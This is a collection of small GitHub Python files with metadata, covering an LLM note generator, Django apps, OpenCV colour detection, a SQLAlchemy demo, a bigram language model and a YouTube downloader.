+{"seq_id": "14127571237", "text": "from llama_index.llms import Replicate\nfrom llama_index import set_global_tokenizer # set tokenizer to match LLM\nfrom transformers import AutoTokenizer\nfrom llama_index.embeddings import HuggingFaceEmbedding\nfrom llama_index import ServiceContext\nfrom llama_index import VectorStoreIndex, SimpleDirectoryReader\n\nquery_message = '''Using the data provided, write detailed study notes. \n Keep generating until you are finished summarizing the data.\n Ensure you use all the information provided. \n Make sure your response looks like a student wrote it during class. Limit each line in the response to 100 characters. \n Do not include information about the authors to keep it anonymous. '''\nllama2_7b_chat = \"meta/llama-2-7b-chat:8e6975e5ed6174911a6ff3d60540dfd4844201974602551e10e9e87ab143d81e\"\n\ndef llama_supernotes(folderpath):\n llm = Replicate(\n model=llama2_7b_chat,\n temperature=0.9,\n additional_kwargs={\"top_p\": 1, \"max_new_tokens\": 3000},\n )\n\n set_global_tokenizer(\n AutoTokenizer.from_pretrained(\"NousResearch/Llama-2-7b-chat-hf\").encode\n )\n\n embed_model = HuggingFaceEmbedding(model_name=\"BAAI/bge-small-en-v1.5\")\n service_context = ServiceContext.from_defaults(\n llm=llm, embed_model=embed_model\n )\n\n documents = SimpleDirectoryReader(folderpath).load_data()\n index = VectorStoreIndex.from_documents(\n documents, service_context=service_context\n )\n query_engine = index.as_query_engine()\n response = query_engine.query(query_message)\n if __name__ == \"__main__\":\n print(response.response)\n return response.response\n\nif __name__ == \"__main__\":\n llama_supernotes(\"docs\")\n\n", "repo_name": "ishaan-arya/note-mesh-student", "sub_path": "machine-learning/llm.py", "file_name": "llm.py", "file_ext": "py", "file_size_in_byte": 1682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "llama_index.llms.Replicate", "line_number": 16, "usage_type": "call"}, {"api_name": "llama_index.set_global_tokenizer", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "llama_index.embeddings.HuggingFaceEmbedding", "line_number": 26, "usage_type": "call"}, {"api_name": "llama_index.ServiceContext.from_defaults", "line_number": 27, "usage_type": "call"}, {"api_name": "llama_index.ServiceContext", "line_number": 27, "usage_type": "name"}, {"api_name": "llama_index.SimpleDirectoryReader", "line_number": 31, "usage_type": "call"}, {"api_name": "llama_index.VectorStoreIndex.from_documents", "line_number": 32, "usage_type": "call"}, {"api_name": "llama_index.VectorStoreIndex", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "74265362329", "text": "import os\n\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nload_dotenv(dotenv_path=Path(\".env\")) # Переменные (пароли, ИД) из файла .env\n\n\nADMINS = os.environ.get(\"ADMINS\").split(\",\")\nBOT_API_KEY = os.environ.get(\"BOT_API_KEY\")\n\nSHOW_FREE = \"Когда свободное время\"\nABOUT_MY = \"Обо мне\"\n\nSHOW_ALL = \"Показать все записи\"\nADD_GIRL = \"Добавить запись\"\nDELETE_GIRL = \"Удалить запись\"\nADD_ADMIN = \"Добавить администратора\"\n\nBUSY = \"Занята\"\nFREE = \"Свободная\"\n\nACCOUNT_TYPE_ADMIN = 1\nACCOUNT_TYPE_GIRL = 2\n\n# При указании * чтобы передавались только эти переменные\n__all__ = (\n \"ADMINS\",\n \"BOT_API_KEY\",\n \"SHOW_FREE\",\n \"SHOW_ALL\",\n \"ADD_GIRL\",\n \"DELETE_GIRL\",\n \"ADD_ADMIN\",\n \"BUSY\",\n \"FREE\",\n \"ACCOUNT_TYPE_ADMIN\",\n \"ACCOUNT_TYPE_GIRL\",\n)\n", "repo_name": "fier43/ManageBot", "sub_path": "bot/bot/constants.py", "file_name": "constants.py", "file_ext": "py", "file_size_in_byte": 954, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 6, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}]}
+{"seq_id": "24541430279", "text": "import cv2\r\nimport numpy as np\r\n\r\nOriginal = cv2.imread(\"original.png\")\r\nChanged = cv2.imread(\"change.png\")\r\n# specify colors boundaries\r\nP_lowerBoundary = [137, 73, 163]\r\nP_upperBoundary = [177, 113, 203]\r\n\r\nW_lowerBoundary = [220, 204, 182]\r\nW_upperBoundary = [255, 244, 222]\r\n\r\n# change data type to uint8 to be used with the bitwise_and function\r\nP_lowerBoundary = np.array(P_lowerBoundary, dtype = \"uint8\")\r\nP_upperBoundary = np.array(P_upperBoundary, dtype = \"uint8\")\r\n\r\nW_lowerBoundary = np.array(W_lowerBoundary, dtype = \"uint8\")\r\nW_upperBoundary = np.array(W_upperBoundary, dtype = \"uint8\")\r\n\r\n# Create Color Mask\r\nP_mask = cv2.inRange(Original, P_lowerBoundary, P_upperBoundary) \r\nW_mask = cv2.inRange(Original, W_lowerBoundary, W_upperBoundary)\r\n\r\n# Merge detected color with mask\r\nP_res = cv2.bitwise_and(Original, Original, mask = P_mask)\r\nW_res = cv2.bitwise_and(Original, Original, mask = W_mask)\r\n\r\ncv2.imshow('PINK', np.hstack([Original, P_res]))\r\ncv2.imshow('White', np.hstack([Original, W_res]))\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n", "repo_name": "NadaAbbasMohamed/ROV-Competition", "sub_path": "Task 1 - Color Detection Coral Reef Color Change/color detection_2.py", "file_name": "color detection_2.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "28145258082", "text": "import secrets\nimport string\nimport sys\n\ndef main(iters=20):\n try:\n rondas = int(iters)\n final = string.ascii_letters + string.punctuation.replace(\"\\'\", \"\").replace('\"', '')\n key = \"\"\n for i in range(rondas):\n key += secrets.choice(final)\n print(key)\n return key\n except Exception as e:\n raise ValueError(\"Second parameter must be a Integer.\")\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if len(args) == 1:\n main(args[0])\n elif len(args) == 0:\n main()\n else:\n print(\"\\nGenerate random secure key.\")\n print(f'\\n. {sys.argv[0]} [string] [integer]\\n')\n print(\"Options:\\n1) String\\n2) Iterations - Integer\\n\")\n", "repo_name": "kurotom/littleKeysGenerator", "sub_path": "generateRandomKeys.py", "file_name": "generateRandomKeys.py", "file_ext": "py", "file_size_in_byte": 725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "string.ascii_letters", "line_number": 8, "usage_type": "attribute"}, {"api_name": "string.punctuation.replace", "line_number": 8, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 8, "usage_type": "attribute"}, {"api_name": "secrets.choice", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}]}
+{"seq_id": "1257750606", "text": "from django.contrib.auth.models import User,Group\nfrom django import forms\nfrom basicinformation.models import *\nfrom basicinformation.tasks import *\nfrom .models import *\n\nclass CreateTimeTableForm(forms.ModelForm):\n class Meta:\n model = TimeTable\n fields = [\n 'date',\n 'timeStart',\n 'timeEnd',\n 'batch',\n 'sub',\n 'note',\n\n ]\n read_only_fields = ('created')\n", "repo_name": "prashantspandey/BodhiAI", "sub_path": "QuestionsAndPapers/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "266789491", "text": "\nfrom collections import Counter\n\nwith open('2021/week_2/day_14/polymerinput.txt') as f:\n polyinputs = [f.strip() for f in f.readlines()]\n\ndef base_poly_and_pairs():\n poly = polyinputs[0]\n\n keys = [pair[0:2] for pair in polyinputs[2:]]\n vals = [pair[6] for pair in polyinputs[2:]]\n\n pairs = {keys[i]: vals[i] for i in range(len(keys))}\n\n return poly, pairs\n\npoly, pairs = base_poly_and_pairs()\n\ndef pair_insertion(steps, poly, pairs):\n for _ in range(steps):\n new_poly = []\n chunks = [poly[i:i+2] for i in range(len(poly)-1)]\n for c in chunks:\n if c in pairs.keys():\n new_poly += c[0] + pairs[c]\n\n new_poly.append(chunks[-1][1])\n poly = ''.join(new_poly)\n\n element_count = Counter(poly)\n return element_count.most_common()[0][1] - element_count.most_common()[-1][1]\n\nprint(pair_insertion(10, poly, pairs))\n\n\n\n\n\n", "repo_name": "JackIHill/AdventOfCode", "sub_path": "2021/week_2/day_14/day14_puzzles.py", "file_name": "day14_puzzles.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.Counter", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "40478173877", "text": "from django.db.models import Q\nfrom message_control.models import MatchEX\nfrom exchange_control.models import Exchange, SelectedEx\ndef setDone(instance):\n if instance.case_match != None:\n # add case\n user_case = Exchange.objects.get(id=instance.case_match.id)\n user_case.status = instance.status\n user_case.save()\n print(user_case.id, user_case.author.id)\n print(instance.id, instance.author.id)\n matching = MatchEX.objects.filter(\n Q(author=user_case.author.id, user=instance.author.id) | Q(author=instance.author.id, user=user_case.author.id)\n )\n print(matching)\n for m in matching:\n m.case_match.remove(instance)\n m.save()\n print('remove case')\n if instance.status == 'Wait':\n instance.case_match = None\n instance.save()\n user_case.case_match = None\n user_case.save()\n else:\n pass\n else:\n # select case\n selected = SelectedEx.objects.filter(caseEx=instance.id)\n print(selected)\n \n for i in selected:\n matching = MatchEX.objects.filter(\n Q(author=i.user.id, user=instance.author.id) | Q(author=instance.author.id, user=i.user.id)\n )\n print(matching)\n for m in matching:\n m.case_match.remove(instance)\n m.save()\n print('remove case')\n\n sel = SelectedEx.objects.get(id=i.id)\n sel.delete()\n print('delete')\n \n", "repo_name": "ChanakanD/deal", "sub_path": "exchange_control/setDone.py", "file_name": "setDone.py", "file_ext": "py", "file_size_in_byte": 1576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "exchange_control.models.Exchange.objects.get", "line_number": 7, "usage_type": "call"}, {"api_name": "exchange_control.models.Exchange.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "exchange_control.models.Exchange", "line_number": 7, "usage_type": "name"}, {"api_name": "message_control.models.MatchEX.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "message_control.models.MatchEX.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "message_control.models.MatchEX", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 13, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects.filter", "line_number": 29, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "exchange_control.models.SelectedEx", "line_number": 29, "usage_type": "name"}, {"api_name": "message_control.models.MatchEX.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "message_control.models.MatchEX.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "message_control.models.MatchEX", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 34, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "exchange_control.models.SelectedEx", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "34247988617", "text": "from sqlalchemy import create_engine, Column, String, Integer\nfrom sqlalchemy import select, func, and_, or_, between, union\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\nengine = create_engine(\"mysql+pymysql://elko:elko@10.10.64.201/elko\", echo = False)\n\nBase = declarative_base()\n\nclass City(Base):\n\n __tablename__= \"city\"\n\n #id\n id = Column(Integer, primary_key=True)\n # name\n name = Column(String(10))\n # age\n population = Column(Integer)\n\n\n\n def getName(self):\n return \"Wonderful \"+self.name\n\n def getPopulation(self):\n return self.population\n\n\nBase.metadata.create_all(engine)\n\nKyiv = City(id =1, name = \"Kyiv\", population = 3700000)\n\nsession = sessionmaker(engine)\nopen_session = session()\n\n#add info to table\n\n# open_session.add_all([\n# # City( name = \"Kyiv\", population = 3700000),\n# # City( name = \"Kharkiv\", population = 1400000)\n# City( name = \"Lviv\", population = 721000)\n# ])\nopen_session.commit()\n\n# print(Kyiv.getName())\n# print(Kyiv.getPopulation())\n\n#select all cities with their populations\n\ncities = open_session.query(City).all()\nfor city in cities:\n print(city.getName(), \"population is \", city.getPopulation())\n\n#select first element of table\n\nfirst_city = open_session.query(City).first()\nprint(first_city.name, \"is first city on DB\")\n\ncity_id = open_session.query(City).get(6)\nprint(\"Second city on DB is \", city_id.name)\n\n\n#update info (содержит ошибки)\n\n# lviv = open_session.query(City).get(7)\n# lviv.population = lviv.getPopulation()+20000\n#\n# open_session.commit()\n#\n# for lviv in open_session.query(City).all():\n# lviv.population = lviv.getPopulation()+20000\n#\n# open_session.commit()\n\n#select with filter\n\ncities = open_session.query(City).filter(and_(City.population>1000000, City.population<2000000))\nfor city in cities:\n print(city.population)\n\n\n#delete info from table\n\n# open_session.query(City).filter(and_(City.population>3000000)).delete()\n\n", "repo_name": "JohnKosten/lessons_py", "sub_path": "orm_classes.py", "file_name": "orm_classes.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 16, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 20, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.and_", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "3411079387", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BigramLanguageModel(nn.Module):\n def __init__(self, vocab_size):\n super().__init__()\n self.embedding = nn.Embedding(vocab_size, vocab_size)\n\n def forward(self, x, targets=None):\n # logits: b*t => b*t*c\n logits = self.embedding(x) \n\n if targets is not None:\n # cross-entropy for predicted distribution\n # (in this case, embedding layer actually represents trainable statistics\n # for next character prediction, i.e. each row is log p(x_i+1 | x_i))\n # and targets is essentially array of next tokens per each\n b, t, c = logits.shape\n logits = logits.view(b*t, c)\n targets = torch.flatten(targets)\n loss = F.cross_entropy(logits, targets)\n return logits, loss\n else:\n return logits, None\n \n def generate(self, idx, max_new_tokens):\n for _ in range(max_new_tokens):\n logits, _ = self(idx)\n # last logit in each batch\n logits = logits[:, -1, :]\n # turn logits into probability\n probs = F.softmax(logits, dim=1)\n # sample next token idx per batch\n idx_next = torch.multinomial(probs, num_samples=1)\n # concatenate predicted idx to sequence, repeat\n idx = torch.cat((idx, idx_next), dim=1) \n return idx\n", "repo_name": "shredder67/gpt-playground", "sub_path": "src/bigram_model.py", "file_name": "bigram_model.py", "file_ext": "py", "file_size_in_byte": 1456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.multinomial", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "254450377", "text": "#!/usr/bin/env python3\n\nfrom pytube import YouTube\nfrom pytube.cli import on_progress\nfrom termcolor import colored\nimport re\nfrom youtube.files import remove_files\nfrom youtube.mpeg import merge_mp4_audio_and_video, convert_audio_to_mp3\nfrom youtube.format import shorten_name\nfrom urllib.error import HTTPError\nfrom random import randrange\nfrom time import sleep\n\n\nPROFILES = {\n 'progressive': {\n 'intro_message': 'file in highest available progressive resolution...',\n 'params': {\n 'progressive': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'resolution',\n 'out_message': 'Progressive MP4 file successfully downloaded!'\n },\n 'video': {\n 'intro_message': '.mp4 video file in highest available resolution...',\n 'params': {\n 'progressive': False,\n 'only_video': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'resolution',\n 'out_message': '.mp4 video file was successfully downloaded!'\n },\n 'audio': {\n 'intro_message': 'audio file in highest available bitrate...',\n 'params': {\n 'progressive': False,\n 'only_audio': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'abr',\n 'out_message': 'Audio track successfully downloaded...'\n }\n}\n\n\ndef get_filename(url: str):\n \"\"\"Validate if URL is ever exists and return output filename.\n\n Args:\n url (str): some YouTube URL\n\n Returns:\n [str] or [None]: output filename or None if URL is not correct\n \"\"\"\n try:\n yt = YouTube(url=url)\n title = re.sub(r'[^\\w\\s-]', '', yt.title) # remove all symbols\n title = re.sub(r'\\s+', ' ', title) # remove recurring spaces\n publish_date = yt.publish_date.strftime('%Y-%m-%d')\n slug = yt.video_id\n except HTTPError:\n print(colored(f'HTTP Error 404: url \"{url}\" not found!\\n', 'red'))\n return None\n except Exception as e:\n print(colored(f'Error: some unexpected error occured - \"{e}\"', 'red'))\n return None\n else:\n return f'{publish_date} - {title} [{slug}]'\n\n\ndef list_all_streams(url):\n return YouTube(url=url).streams\n\n\ndef list_streams(url: str, settings: dict):\n try:\n yt = YouTube(url=url).streams.\\\n filter(**settings['params']).\\\n order_by(settings['order_by']).\\\n desc()\n except Exception as err:\n print(f'Some error occured while listing streams: {err}')\n else:\n return list(yt) # 'list' here required to format output while print\n\n\ndef download(url: str, settings: dict, filename: str):\n try:\n yt = YouTube(url=url, on_progress_callback=on_progress).streams.\\\n filter(**settings['params']).\\\n order_by(settings['order_by']).\\\n desc().\\\n first()\n except Exception as error:\n print(f'Some error occured while downloading: {error}')\n else:\n print(\n colored(f'Downloading \"{shorten_name(yt.title)}\" '\n f'{settings[\"intro_message\"]}'))\n yt.download(filename=f'{filename}.mp4', skip_existing=False,\n timeout=10, max_retries=5)\n print(colored(f'\\n{settings[\"out_message\"]}', 'blue'))\n\n\ndef load_hq_video(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old and temp files if exists, then download audio and video files\n remove_files('audio.mp4', 'video.mp4', f'{filename}.mp4')\n download(url=url, settings=PROFILES['audio'], filename='audio')\n download(url=url, settings=PROFILES['video'], filename='video')\n\n # Merge output and video files\n merge_mp4_audio_and_video(audio_file='audio', video_file='video',\n output_filename=filename)\n\n # Print summary message\n 
print(colored(f'Video was saved as \"{shorten_name(filename)}.mp4\"!',\n 'green'))\n\n # Remove temp files\n remove_files('audio.mp4', 'video.mp4')\n\n # Print empty line\n print()\n\n\ndef load_hq_audio(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old and temp files if exists, then download mp4 audio file\n remove_files('audio.mp4', f'{filename}.mp3')\n download(url=url, settings=PROFILES['audio'], filename='audio')\n\n # Convert mp4 file into mp3 file\n convert_audio_to_mp3(audio_file='audio', output_filename=filename)\n\n # Print summary message\n print(colored(f'MP3 track was saved as \"{shorten_name(filename)}.mp3\"!',\n 'green'))\n\n # Remove temp file\n remove_files('audio.mp4')\n\n # Print empty line\n print()\n\n\ndef load_progressive(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old file (not temp!) with the same name if it ever exist,\n # and download video in progressive format\n remove_files(f'{filename}.mp4')\n download(url=url, settings=PROFILES['progressive'], filename=filename)\n\n # Print summary message\n print(colored(f'Video was saved as \"{shorten_name(filename)}.mp4\"!',\n 'green'))\n\n # Print empty line\n print()\n\n\ndef make_pause(min: int, max: int):\n timeout = randrange(min, max)\n print(f'Making pause between requests for {timeout} seconds...\\n')\n sleep(timeout)\n\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "n8creator/youtube", "sub_path": "youtube/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 5636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pytube.YouTube", "line_number": 58, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 63, "usage_type": "name"}, {"api_name": "termcolor.colored", "line_number": 64, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 67, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 74, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 79, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 91, "usage_type": "call"}, {"api_name": "pytube.cli.on_progress", "line_number": 91, "usage_type": "name"}, {"api_name": "termcolor.colored", "line_number": 100, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 100, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 104, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 116, "usage_type": "call"}, {"api_name": "youtube.mpeg.merge_mp4_audio_and_video", "line_number": 121, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 125, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 125, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 129, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 144, "usage_type": "call"}, {"api_name": "youtube.mpeg.convert_audio_to_mp3", "line_number": 148, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 151, "usage_type": "call"}, {"api_name": 
"youtube.format.shorten_name", "line_number": 151, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 155, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 171, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 175, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 175, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 183, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 185, "usage_type": "call"}]}
+{"seq_id": "47998429254", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom bailout.views import index, data, links, member_search, financial_services_committee, switchers, no_no, yes_yes, register, user_login, user_dashboard, rating_page, user_logout, members_by_user_state, user_ratings, analyze, order_by_pac, explain_variables, members_of_congress_list, member_of_congress_detail\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n url(r'^$', index),\n url(r'^data$', data),\n url(r'^links$', links),\n url(r'^member_search$', member_search),\n url(r'^financial_services_committee$', financial_services_committee),\n url(r'^switchers$', switchers),\n url(r'^no_no$', no_no),\n url(r'^yes_yes$', yes_yes),\n url(r'^register$', register),\n url(r'^login/$', user_login),\n url(r'^logout/$', user_logout),\n url(r'^dashboard$', user_dashboard),\n url(r'^dashboard/(?P\\d+)$', rating_page), #change to r'^/rate/...\n url(r'^dashboard/(?P\\w+)$', members_by_user_state),\n url(r'^ratings/$', user_ratings),\n url(r'^analyze/$', analyze),\n url(r'^order_by_pac/$', order_by_pac),\n url(r'^explain_variables$', explain_variables),\n url(r'^members_of_congress/$', members_of_congress_list),\n url(r'^member_of_congress/(?P[\\w\\s]+)/$', member_of_congress_detail),\n\n\n\n # url(r'^members/$', members_of_congress_list),\n # url(r'^api/(?P[0-9]+)/$', member_of_congress_detail),\n\n # url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n", "repo_name": "joshuagendal/2008-Bank-Bailout-Data-Project", "sub_path": "bailout/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "bailout.views.index", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "bailout.views.data", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "bailout.views.links", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "bailout.views.member_search", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "bailout.views.financial_services_committee", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "bailout.views.switchers", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "bailout.views.no_no", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "bailout.views.yes_yes", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "bailout.views.register", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "bailout.views.user_login", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 17, 
"usage_type": "call"}, {"api_name": "bailout.views.user_logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "bailout.views.user_dashboard", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "bailout.views.rating_page", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "bailout.views.members_by_user_state", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "bailout.views.user_ratings", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "bailout.views.analyze", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "bailout.views.order_by_pac", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "bailout.views.explain_variables", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "bailout.views.members_of_congress_list", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "bailout.views.member_of_congress_detail", "line_number": 26, "usage_type": "argument"}, {"api_name": "rest_framework.urlpatterns.format_suffix_patterns", "line_number": 36, "usage_type": "call"}]}
